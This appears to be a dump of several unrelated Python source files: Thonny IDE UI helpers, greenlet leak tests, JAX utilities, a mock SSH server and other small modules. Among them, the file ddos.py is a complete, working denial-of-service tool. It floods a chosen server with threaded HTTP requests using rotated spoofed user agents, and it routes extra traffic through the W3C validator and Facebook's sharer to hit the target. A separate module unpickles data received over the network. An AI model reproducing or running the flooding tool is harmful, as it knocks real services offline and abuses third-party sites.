                        ("stderr",),
                    )
elif self._autoclose:
self._close()
else:
self.text.direct_insert("end", "\n\n" + self._conclusion)
self.text.see("end")
poll_output_events()
def _close_if_done(self, event):
if self._proc.poll() is not None:
self._close(event)
def _close(self, event=None):
if self._proc.poll() is None:
if messagebox.askyesno(
"Cancel the process?",
"The process is still running.\nAre you sure you want to cancel?",
parent=self,
):
# try gently first
try:
if running_on_windows():
os.kill(
self._proc.pid, signal.CTRL_BREAK_EVENT
) # @UndefinedVariable
else:
os.kill(self._proc.pid, signal.SIGINT)
self._proc.wait(2)
except subprocess.TimeoutExpired:
if self._proc.poll() is None:
# now let's be more concrete
self._proc.kill()
self.cancelled = True
# Wait for threads to finish
self._stdout_thread.join(2)
if self._stderr_thread is not None:
self._stderr_thread.join(2)
# fetch output about cancelling
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.direct_insert("end", "\n\nPROCESS CANCELLED")
self.text.see("end")
else:
return
else:
self._closed = True
self.destroy()
def get_busy_cursor():
if running_on_windows():
return "wait"
elif running_on_mac_os():
return "spinning"
else:
return "watch"
def get_tk_version_str():
return tk._default_root.tk.call("info", "patchlevel")
def get_tk_version_info():
result = []
for part in get_tk_version_str().split("."):
try:
result.append(int(part))
except Exception:
result.append(0)
return tuple(result)
def get_style_configuration(style_name, default={}):
style = ttk.Style()
# NB! style.configure seems to reuse the returned dict
# Don't change it without copying first
result = style.configure(style_name)
if result is None:
return default
else:
return result
def lookup_style_option(style_name, option_name, default=None):
style = ttk.Style()
setting = style.lookup(style_name, option_name)
if setting in [None, ""]:
return default
elif setting == "True":
return True
elif setting == "False":
return False
else:
return setting
def scale(value):
return get_workbench().scale(value)
def open_path_in_system_file_manager(path):
if running_on_mac_os():
# http://stackoverflow.com/a/3520693/261181
# -R doesn't allow showing hidden folders
subprocess.Popen(["open", path])
elif running_on_linux():
subprocess.Popen(["xdg-open", path])
else:
assert running_on_windows()
subprocess.Popen(["explorer", path])
def _get_dialog_provider():
if platform.system() != "Linux":
return filedialog
if shutil.which("zenity"):
return _ZenityDialogProvider
# fallback
return filedialog
def asksaveasfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getSaveFile.htm
_ensure_parent(options)
return _get_dialog_provider().asksaveasfilename(**options)
def askopenfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_ensure_parent(options)
return _get_dialog_provider().askopenfilename(**options)
def askopenfilenames(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_ensure_parent(options)
return _get_dialog_provider().askopenfilenames(**options)
def askdirectory(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/chooseDirectory.htm
_ensure_parent(options)
return _get_dialog_provider().askdirectory(**options)
def _ensure_parent(options):
if "parent" not in options:
if "master" in options:
options["parent"] = options["master"]
else:
options["parent"] = tk._default_root
class _ZenityDialogProvider:
# https://www.writebash.com/bash-gui/zenity-create-file-selection-dialog-224.html
# http://linux.byexamples.com/archives/259/a-complete-zenity-dialog-examples-1/
# http://linux.byexamples.com/archives/265/a-complete-zenity-dialog-examples-2/
# another possibility is to use PyGobject: https://github.com/poulp/zenipy
@classmethod
def askopenfilename(cls, **options):
args = cls._convert_common_options("Open file", **options)
return cls._call(args)
@classmethod
def askopenfilenames(cls, **options):
args = cls._convert_common_options("Open files", **options)
        filenames = cls._call(args + ["--multiple"])
        if not filenames:
            return []
        return filenames.split("|")
@classmethod
def asksaveasfilename(cls, **options):
args = cls._convert_common_options("Save as", **options)
args.append("--save")
if options.get("confirmoverwrite", True):
args.append("--confirm-overwrite")
filename = cls._call(args)
if not filename:
return None
if "defaultextension" in options and "." not in os.path.basename(filename):
filename += options["defaultextension"]
return filename
@classmethod
def askdirectory(cls, **options):
args = cls._convert_common_options("Select directory", **options)
args.append("--directory")
return cls._call(args)
@classmethod
def _convert_common_options(cls, default_title, **options):
args = ["--file-selection", "--title=%s" % options.get("title", default_title)]
filename = _options_to_zenity_filename(options)
if filename:
args.append("--filename=%s" % filename)
parent = options.get("parent", options.get("master", None))
if parent is not None:
args.append("--modal")
args.append("--attach=%s" % hex(parent.winfo_id()))
for desc, pattern in options.get("filetypes", ()):
# zenity requires star before extension
pattern = pattern.replace(" .", " *.")
if pattern.startswith("."):
pattern = "*" + pattern
if pattern == "*.*":
# ".*" was provided to make the pattern safe for Tk dialog
# not required with Zenity
pattern = "*"
args.append("--file-filter=%s | %s" % (desc, pattern))
return args
@classmethod
def _call(cls, args):
args = ["zenity", "--name=Thonny", "--class=Thonny"] + args
result = subprocess.run(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
if result.returncode == 0:
return result.stdout.strip()
else:
# could check stderr, but it may contain irrelevant warnings
return None
def _options_to_zenity_filename(options):
if options.get("initialdir"):
if options.get("initialfile"):
return os.path.join(options["initialdir"], options["initialfile"])
else:
return options["initialdir"] + os.path.sep
return None
def register_latin_shortcut(
registry, sequence: str, handler: Callable, tester: Optional[Callable]
) -> None:
res = sequence_to_event_state_and_keycode(sequence)
if res is not None:
if res not in registry:
registry[res] = []
registry[res].append((handler, tester))
def handle_mistreated_latin_shortcuts(registry, event):
# tries to handle Ctrl+LatinLetter shortcuts
# given from non-Latin keyboards
# See: https://bitbucket.org/plas/thonny/issues/422/edit-keyboard-shortcuts-ctrl-c-ctrl-v-etc
# only consider events with Control held
if not event.state & 0x04:
return
if running_on_mac_os():
return
# consider only part of the state,
# because at least on Windows, Ctrl-shortcuts' state
# has something extra
simplified_state = 0x04
if shift_is_pressed(event.state):
simplified_state |= 0x01
# print(simplified_state, event.keycode)
if (simplified_state, event.keycode) in registry:
if event.keycode != ord(event.char):
# keycode and char doesn't match,
# this means non-latin keyboard
for handler, tester in registry[(simplified_state, event.keycode)]:
if tester is None or tester():
handler()
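# Usage sketch (not part of the original module): build a registry once, then
# route raw <Key> events through it so Ctrl+C/Ctrl+V keep working on non-Latin
# layouts; `text` and the handlers are illustrative.
def _demo_latin_shortcuts(text):
    registry = {}
    register_latin_shortcut(registry, "<Control-c>",
                            lambda: text.event_generate("<<Copy>>"), None)
    register_latin_shortcut(registry, "<Control-v>",
                            lambda: text.event_generate("<<Paste>>"), None)
    text.bind("<Key>",
              lambda event: handle_mistreated_latin_shortcuts(registry, event),
              True)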
def show_dialog(dlg, master=None, geometry=True):
if master is None:
master = tk._default_root
get_workbench().event_generate("WindowFocusOut")
# following order seems to give most smooth appearance
focused_widget = master.focus_get()
dlg.transient(master.winfo_toplevel())
if geometry:
# dlg.withdraw() # unfortunately inhibits size calculations in assign_geometry
if isinstance(geometry, str):
dlg.geometry(geometry)
else:
assign_geometry(dlg, master)
# dlg.wm_deiconify()
try:
dlg.grab_set()
except:
pass
dlg.lift()
dlg.focus_set()
master.winfo_toplevel().wait_window(dlg)
dlg.grab_release()
master.winfo_toplevel().lift()
master.winfo_toplevel().focus_force()
master.winfo_toplevel().grab_set()
if focused_widget is not None:
try:
focused_widget.focus_force()
except TclError:
pass
def popen_with_ui_thread_callback(
*Popen_args, on_completion, poll_delay=0.1, **Popen_kwargs
):
if "encoding" not in Popen_kwargs:
if "env" not in Popen_kwargs:
Popen_kwargs["env"] = os.environ.copy()
Popen_kwargs["env"]["PYTHONIOENCODING"] = "utf-8"
if sys.version_info >= (3, 6):
Popen_kwargs["encoding"] = "utf-8"
proc = subprocess.Popen(*Popen_args, **Popen_kwargs)
# Need to read in thread in order to avoid blocking because
# of full pipe buffer (see https://bugs.python.org/issue1256)
out_lines = []
err_lines = []
def read_stream(stream, target_list):
while True:
line = stream.readline()
if line:
target_list.append(line)
else:
break
t_out = threading.Thread(
target=read_stream, daemon=True, args=(proc.stdout, out_lines)
)
t_err = threading.Thread(
target=read_stream, daemon=True, args=(proc.stderr, err_lines)
)
t_out.start()
t_err.start()
def poll():
if proc.poll() is not None:
t_out.join(3)
t_err.join(3)
on_completion(proc, out_lines, err_lines)
return
tk._default_root.after(int(poll_delay * 1000), poll)
poll()
return proc
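# Usage sketch (not part of the original module): run a subprocess with piped
# output and get called back on the Tk main loop when it finishes. Assumes a Tk
# root exists and its mainloop is running; the command line is illustrative.
def _demo_popen_with_ui_thread_callback():
    def on_completion(proc, out_lines, err_lines):
        print("exit code:", proc.returncode)
        print("".join(out_lines))
    popen_with_ui_thread_callback(
        [sys.executable, "-m", "pip", "--version"],
        on_completion=on_completion,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )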
class MenuEx(tk.Menu):
def __init__(self, target):
self._testers = {}
super().__init__(
target,
tearoff=False,
postcommand=self.on_post,
**get_style_configuration("Menu")
)
def on_post(self, *args):
self.update_item_availability()
def update_item_availability(self):
for i in range(self.index("end") + 1):
item_data = self.entryconfigure(i)
if "label" in item_data:
tester = self._testers.get(item_data["label"])
if tester and not tester():
self.entryconfigure(i, state=tk.DISABLED)
else:
self.entryconfigure(i, state=tk.NORMAL)
def add(self, kind, cnf={}, **kw):
cnf = cnf or kw
tester = cnf.get("tester")
if "tester" in cnf:
del cnf["tester"]
super().add(kind, cnf)
itemdata = self.entryconfigure(self.index("end"))
labeldata = itemdata.get("label")
if labeldata:
self._testers[labeldata] = tester
class TextMenu(MenuEx):
def __init__(self, target):
self.text = target
MenuEx.__init__(self, target)
self.add_basic_items()
self.add_extra_items()
def add_basic_items(self):
self.add_command(label="Cut", command=self.on_cut, tester=self.can_cut)
self.add_command(label="Copy", command=self.on_copy, tester=self.can_copy)
self.add_command(label="Paste", command=self.on_paste, tester=self.can_paste)
def add_extra_items(self):
self.add_separator()
self.add_command(label="Select All", command=self.on_select_all)
def on_cut(self):
self.text.event_generate("<<Cut>>")
def on_copy(self):
self.text.event_generate("<<Copy>>")
def on_paste(self):
self.text.event_generate("<<Paste>>")
def on_select_all(self):
self.text.event_generate("<<SelectAll>>")
def can_cut(self):
return self.get_selected_text() and not self.selection_is_read_only()
def can_copy(self):
return self.get_selected_text()
def can_paste(self):
return not self.selection_is_read_only()
def get_selected_text(self):
try:
return self.text.get("sel.first", "sel.last")
except TclError:
return ""
def selection_is_read_only(self):
if hasattr(self.text, "is_read_only"):
return self.text.is_read_only()
return False
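# Usage sketch (not part of the original module): pop up the context menu on
# right-click; the <Button-3> binding is illustrative (macOS typically uses
# <Button-2> for the secondary button).
def _demo_text_menu(text_widget):
    menu = TextMenu(text_widget)
    text_widget.bind(
        "<Button-3>", lambda e: menu.tk_popup(e.x_root, e.y_root), True
    )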
def create_url_label(master, url, text=None):
url_font = tkinter.font.nametofont("TkDefaultFont").copy()
url_font.configure(underline=1)
url_label = ttk.Label(
master,
text=text if text else url,
style="Url.TLabel",
cursor="hand2",
font=url_font,
)
url_label.grid()
url_label.bind("<Button-1>", lambda _: webbrowser.open(url))
return url_label
def get_size_option_name(window):
return "layout." + type(window).__name__ + "_size"
if __name__ == "__main__":
root = tk.Tk()
closa = ClosableNotebook(root)
closa.add(ttk.Button(closa, text="B1"), text="B1")
closa.add(ttk.Button(closa, text="B2"), text="B2")
closa.grid()
root.mainloop()
|
test_leaks.py
|
import unittest
import sys
import gc
import time
import weakref
import greenlet
import threading
class ArgRefcountTests(unittest.TestCase):
def test_arg_refs(self):
args = ('a', 'b', 'c')
refcount_before = sys.getrefcount(args)
g = greenlet.greenlet(
lambda *args: greenlet.getcurrent().parent.switch(*args))
for i in range(100):
g.switch(*args)
self.assertEqual(sys.getrefcount(args), refcount_before)
def test_kwarg_refs(self):
kwargs = {}
g = greenlet.greenlet(
lambda **kwargs: greenlet.getcurrent().parent.switch(**kwargs))
for i in range(100):
g.switch(**kwargs)
self.assertEqual(sys.getrefcount(kwargs), 2)
if greenlet.GREENLET_USE_GC:
# These only work with greenlet gc support
def recycle_threads(self):
# By introducing a thread that does sleep we allow other threads,
# that have triggered their __block condition, but did not have a
# chance to deallocate their thread state yet, to finally do so.
# The way it works is by requiring a GIL switch (different thread),
# which does a GIL release (sleep), which might do a GIL switch
# to finished threads and allow them to clean up.
def worker():
time.sleep(0.001)
t = threading.Thread(target=worker)
t.start()
time.sleep(0.001)
t.join()
def test_threaded_leak(self):
gg = []
def worker():
# only main greenlet present
gg.append(weakref.ref(greenlet.getcurrent()))
for i in range(2):
t = threading.Thread(target=worker)
t.start()
t.join()
del t
greenlet.getcurrent() # update ts_current
self.recycle_threads()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertTrue(g() is None)
def test_threaded_adv_leak(self):
gg = []
def worker():
# main and additional *finished* greenlets
ll = greenlet.getcurrent().ll = []
def additional():
ll.append(greenlet.getcurrent())
for i in range(2):
greenlet.greenlet(additional).switch()
gg.append(weakref.ref(greenlet.getcurrent()))
for i in range(2):
t = threading.Thread(target=worker)
t.start()
t.join()
del t
greenlet.getcurrent() # update ts_current
self.recycle_threads()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertTrue(g() is None)
|
jax_utils.py
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for JAX."""
import queue
import threading
from typing import Iterable, Generator, TypeVar
from absl import logging
from acme import types
import haiku as hk
from jax import tree_util
import jax.numpy as jnp
import numpy as np
import tree
def add_batch_dim(values: types.Nest) -> types.NestedArray:
return tree_util.tree_map(lambda x: jnp.expand_dims(x, axis=0), values)
@hk.transform
def _flatten(x, num_batch_dims: int):
return hk.Flatten(preserve_dims=num_batch_dims)(x)
def batch_concat(
values: types.NestedArray,
num_batch_dims: int = 1,
) -> jnp.ndarray:
"""Flatten and concatenate nested array structure, keeping batch dims."""
flatten_fn = lambda x: _flatten.apply(None, x, num_batch_dims)
flat_leaves = tree.map_structure(flatten_fn, values)
return jnp.concatenate(tree.flatten(flat_leaves), axis=-1)
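# Illustration (not part of the original module): flattening a nested
# observation into a single [batch, features] array while keeping the leading
# batch dimension; the structure and shapes below are arbitrary.
def _demo_batch_concat():
  nest = {'img': jnp.ones((2, 4, 4)), 'pos': jnp.ones((2, 3))}
  flat = batch_concat(nest, num_batch_dims=1)
  assert flat.shape == (2, 16 + 3)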
def zeros_like(nest: types.Nest) -> types.NestedArray:
return tree_util.tree_map(lambda x: jnp.zeros(x.shape, x.dtype), nest)
def squeeze_batch_dim(nest: types.Nest) -> types.NestedArray:
return tree_util.tree_map(lambda x: jnp.squeeze(x, axis=0), nest)
def to_numpy_squeeze(values: types.Nest) -> types.NestedArray:
"""Converts to numpy and squeezes out dummy batch dimension."""
return tree_util.tree_map(lambda x: np.array(x).squeeze(axis=0), values)
def batch_to_sequence(values: types.Nest) -> types.NestedArray:
return tree_util.tree_map(
lambda x: jnp.transpose(x, axes=(1, 0, *range(2, len(x.shape)))), values)
T = TypeVar('T')
def prefetch(iterable: Iterable[T],
buffer_size: int = 5) -> Generator[T, None, None]:
"""Performs prefetching of elements from an iterable in a separate thread.
Args:
iterable: A python iterable. This is used to build the python prefetcher.
Note that each iterable should only be passed to this function once as
iterables aren't thread safe
buffer_size (int): Number of elements to keep in the prefetch buffer.
Yields:
Prefetched elements from the original iterable.
Raises:
    ValueError: if buffer_size <= 1.
    Any error thrown by the iterable. Note this is not raised inside
      the producer, but after it finishes executing.
"""
if buffer_size <= 1:
raise ValueError('the buffer_size should be > 1')
buffer = queue.Queue(maxsize=(buffer_size - 1))
producer_error = []
end = object()
def producer():
"""Enqueues items from `iterable` on a given thread."""
try:
# Build a new iterable for each thread. This is crucial if working with
# tensorflow datasets because tf.Graph objects are thread local.
for item in iterable:
buffer.put(item)
except Exception as e: # pylint: disable=broad-except
      logging.exception('Error in producer thread for %r', iterable)
producer_error.append(e)
finally:
buffer.put(end)
# Start the producer thread.
threading.Thread(target=producer, daemon=True).start()
# Consume from the buffer.
while True:
value = buffer.get()
if value is end:
break
yield value
if producer_error:
raise producer_error[0]
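# Usage sketch (not part of the original module): wrap a single-use iterable so
# the next elements are produced on a background thread while the consumer
# works; the generator below is hypothetical.
def _demo_prefetch():
  dataset = (np.ones((8, 4)) * i for i in range(100))
  for batch in prefetch(dataset, buffer_size=4):
    _ = batch.sum()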
|
DataProcess.py
|
#!/usr/bin/env python
# coding: utf-8
__author__ = 'whoami'
"""
@version: 1.0
@author: whoami
@license: Apache Licence 2.0
@contact: skynet@gmail.com
@site: http://www.itweet.cn
@software: PyCharm Community Edition
@file: DataProcess.py
@time: 2015-12-29 4:25 PM
"""
import ActionProcess
import Tools
import pickle
import threading,os
import datetime
import global_settings
from db import InfluxdbClient
class DataProcess(object):
def __init__(self):
self.hosts = Tools.all_host_configs()
self.db = InfluxdbClient.InfluxdbClient()
def handle(self,msg):
# print 'recv:',msg
# print '>> process data:: %s' % pickle.loads(msg)
data = pickle.loads(msg)
for k,msg in data.items():
fun_name = k.split('::')[0]
time = k.split('::')[1]
ActionProcess.action_process(self, fun_name, time, msg)
print '---------waiting for new msg ---------'
# received data
for host,val in self.hosts['hosts'].items():
if val:
t = threading.Thread(target=self.process,args=[host,val])
t.start()
else:
print '%s host monitor info is null...' % host
def forward(self,msg):
print '-------starting Processing data---------'
self.handle(msg)
def process(self,host,val):
print 'Task %s runs pid %s' % (host,os.getpid())
tags = {
"host": "%s" % host,
"region": "us-west"
}
for v in val.values():
timestamp = float(v['timestamp'])
time = datetime.datetime.fromtimestamp(timestamp).strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
measurement = v['data'].keys()[0]
data = v['data'].values()[0]
self.db.wirte_points(tags,measurement,time,data)
# clear service_instance data object
self.hosts['hosts'][host].clear()
|
concurrent.py
|
"""
@Author Jay Lee
My attempt to provide a set of generic functions
that enable ease of leverage of the power that
concurrency brings to programs.
TODO: Work on this during my downtime
"""
import multiprocessing as mp
def parallel_process(handler_fn, *args, process_count=5):
"""
A function that causes a feature to run in parallel.
Note that it is highly recommended to not add
:return:
"""
outputs = mp.Queue()
processes = [mp.Process(target=handler_fn, args=(outputs, args)) for i in range(process_count)]
for process in processes:
process.start()
for p in processes:
p.join()
results = [outputs.get() for process in processes]
return results
def process_in_parallel(process_count=5, tasks=[]):
"""
General-purpose function for programming
:param process_count: The number of processes used
for the given task
:return:
"""
outputs = mp.Queue()
def parallel_process_decorator(process_fn):
"""
:param process_fn: The function that is being "decorated"
:return:
"""
def output_fn(*args, **kwargs):
def handler_fn(task, task_no):
print(f"task: {task}. Task no: {task_no}")
output = process_fn(task, task_no, *args, **kwargs)
outputs.put(output)
return output
processes = [mp.Process(target=handler_fn, args=(tasks[i], i)) for i in range(len(tasks))]
for process in processes:
process.start()
# Exit completed processes
for p in processes:
p.join()
# Store results in list
results = [outputs.get() for process in processes]
return results
return output_fn
return parallel_process_decorator
if __name__ == "__main__":
import random
import string
tasks = [1, 2, 3, 4, 5, 6]
@process_in_parallel(process_count=7, tasks=tasks)
def double_number(task, task_no):
print(f"Handling task: {task}. Process no: {task_no}")
return task * 2
test = double_number()
print(f"Final output: {test}")
|
server.py
|
import logging
import os
import select
import socket
import subprocess
import threading
try:
from queue import Queue
except ImportError: # Python 2.7
from Queue import Queue
import paramiko
from mockssh import sftp
__all__ = [
"Server",
]
SERVER_KEY_PATH = os.path.join(os.path.dirname(__file__), "server-key")
class Handler(paramiko.ServerInterface):
log = logging.getLogger(__name__)
def __init__(self, server, client_conn):
self.server = server
self.thread = None
self.command_queues = {}
client, _ = client_conn
self.transport = t = paramiko.Transport(client)
t.add_server_key(paramiko.RSAKey(filename=SERVER_KEY_PATH))
t.set_subsystem_handler("sftp", sftp.SFTPServer)
def run(self):
self.transport.start_server(server=self)
while True:
channel = self.transport.accept()
if channel is None:
break
if channel.chanid not in self.command_queues:
self.command_queues[channel.chanid] = Queue()
t = threading.Thread(target=self.handle_client, args=(channel,))
t.setDaemon(True)
t.start()
def handle_client(self, channel):
try:
command = self.command_queues[channel.chanid].get(block=True)
self.log.debug("Executing %s", command)
p = subprocess.Popen(command, shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
channel.sendall(stdout)
channel.sendall_stderr(stderr)
channel.send_exit_status(p.returncode)
except Exception:
self.log.error("Error handling client (channel: %s)", channel,
exc_info=True)
finally:
channel.close()
def check_auth_publickey(self, username, key):
try:
_, known_public_key = self.server._users[username]
except KeyError:
self.log.debug("Unknown user '%s'", username)
return paramiko.AUTH_FAILED
if known_public_key == key:
self.log.debug("Accepting public key for user '%s'", username)
return paramiko.AUTH_SUCCESSFUL
        self.log.debug("Rejecting public key for user '%s'", username)
return paramiko.AUTH_FAILED
def check_channel_exec_request(self, channel, command):
self.command_queues.setdefault(channel.get_id(), Queue()).put(command)
return True
def check_channel_request(self, kind, chanid):
if kind == "session":
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def get_allowed_auths(self, username):
return "publickey"
class Server(object):
host = "127.0.0.1"
log = logging.getLogger(__name__)
def __init__(self, users):
self._socket = None
self._thread = None
self._users = {}
for uid, private_key_path in users.items():
self.add_user(uid, private_key_path)
def add_user(self, uid, private_key_path, keytype="ssh-rsa"):
if keytype == "ssh-rsa":
key = paramiko.RSAKey.from_private_key_file(private_key_path)
elif keytype == "ssh-dss":
key = paramiko.DSSKey.from_private_key_file(private_key_path)
elif keytype in paramiko.ECDSAKey.supported_key_format_identifiers():
key = paramiko.ECDSAKey.from_private_key_file(private_key_path)
elif keytype == "ssh-ed25519":
key = paramiko.Ed25519Key.from_private_key_file(private_key_path)
else:
raise Exception("Unable to handle key of type {}".format(keytype))
self._users[uid] = (private_key_path, key)
def __enter__(self):
self._socket = s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((self.host, 0))
s.listen(5)
self._thread = t = threading.Thread(target=self._run)
t.setDaemon(True)
t.start()
return self
def _run(self):
sock = self._socket
while sock.fileno() > 0:
self.log.debug("Waiting for incoming connections ...")
rlist, _, _ = select.select([sock], [], [], 1.0)
if rlist:
conn, addr = sock.accept()
self.log.debug("... got connection %s from %s", conn, addr)
handler = Handler(self, (conn, addr))
t = threading.Thread(target=handler.run)
t.setDaemon(True)
t.start()
def __exit__(self, *exc_info):
try:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
except Exception:
pass
self._socket = None
self._thread = None
def client(self, uid):
private_key_path, _ = self._users[uid]
c = paramiko.SSHClient()
host_keys = c.get_host_keys()
key = paramiko.RSAKey.from_private_key_file(SERVER_KEY_PATH)
host_keys.add(self.host, "ssh-rsa", key)
host_keys.add("[%s]:%d" % (self.host, self.port), "ssh-rsa", key)
c.set_missing_host_key_policy(paramiko.RejectPolicy())
c.connect(hostname=self.host,
port=self.port,
username=uid,
key_filename=private_key_path,
allow_agent=False,
look_for_keys=False)
return c
@property
def port(self):
return self._socket.getsockname()[1]
@property
def users(self):
return self._users.keys()
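# Usage sketch (not part of the original module): the server is used as a
# context manager and hands out pre-configured paramiko clients; the user id
# and private-key path below are hypothetical.
def _demo_server():
    users = {"sample-user": "/path/to/sample-user-private-key"}
    with Server(users) as server:
        client = server.client("sample-user")
        _, stdout, _ = client.exec_command("echo hello")
        assert stdout.read().strip() == b"hello"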
|
ddos.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Lwa Ddos SCRİPT
#ÇALAN İTİNA İLE SEVİLİR
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m Lottery Whirte Angels DDOS
ArifReis-Lexie
Kullanım : python3 ddos.py [-s] [-p] [-t]
-h : yardım
-s : server ip
-p : port normal 80
-t : turbo normal 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="Çıkkma",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="Server İp")
optp.add_option("-p","--port",type="int",dest="port",help="Port")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="Zaman")
optp.add_option("-h","--help",dest="help",action='store_true',help="Yardım Menüsü")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
pseudo-library.py
|
#!/usr/bin/python
'''
This is a pseudo-library implementation
Example:
./pseudo-library.py -t b168ccc8c8734fad98323247afbc1113 --dump
Author: Volodymyr Shymanskyy
License: The MIT license
'''
import select, socket, struct
import os, sys, time, getopt
from threading import Thread
# Configuration options
# Parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hs:p:t:",
["help", "server=", "port=", "token=", "sndbuf=", "rcvbuf=", "nodelay=", "dump"])
except getopt.GetoptError:
print >>sys.stderr, __doc__
sys.exit(2)
# Default options
SERVER = "blynk-cloud.com"
PORT = 8442
NODELAY = 1 # TCP_NODELAY
SNDBUF = 0 # No SNDBUF override
RCVBUF = 0 # No RCVBUF override
TOKEN = "YourAuthToken"
DUMP = 0
for o, v in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit()
elif o in ("-s", "--server"):
SERVER = v
elif o in ("-p", "--port"):
PORT = int(v)
elif o in ("-t", "--token"):
TOKEN = v
elif o in ("--sndbuf",):
SNDBUF = int(v)
elif o in ("--rcvbuf",):
RCVBUF = int(v)
elif o in ("--nodelay",):
NODELAY = int(v)
elif o in ("--dump",):
DUMP = 1
# Blynk protocol helpers
hdr = struct.Struct("!BHH")
class MsgType:
RSP = 0
LOGIN = 2
PING = 6
BRIDGE = 15
HW = 20
class MsgStatus:
OK = 200
def hw(*args):
# Convert params to string and join using \0
data = "\0".join(map(str, args))
dump("< " + " ".join(map(str, args)))
# Prepend HW command header
return hdr.pack(MsgType.HW, genMsgId(), len(data)) + data
def handle_hw(data):
params = data.split("\0")
cmd = params.pop(0)
if cmd == 'info':
pass
### DIRECT pin operations
elif cmd == 'pm':
pairs = zip(params[0::2], params[1::2])
for (pin, mode) in pairs:
pin = int(pin)
if mode == 'in':
log("Pin %d mode INPUT" % pin)
elif mode == 'out':
log("Pin %d mode OUTPUT" % pin)
elif mode == 'pu':
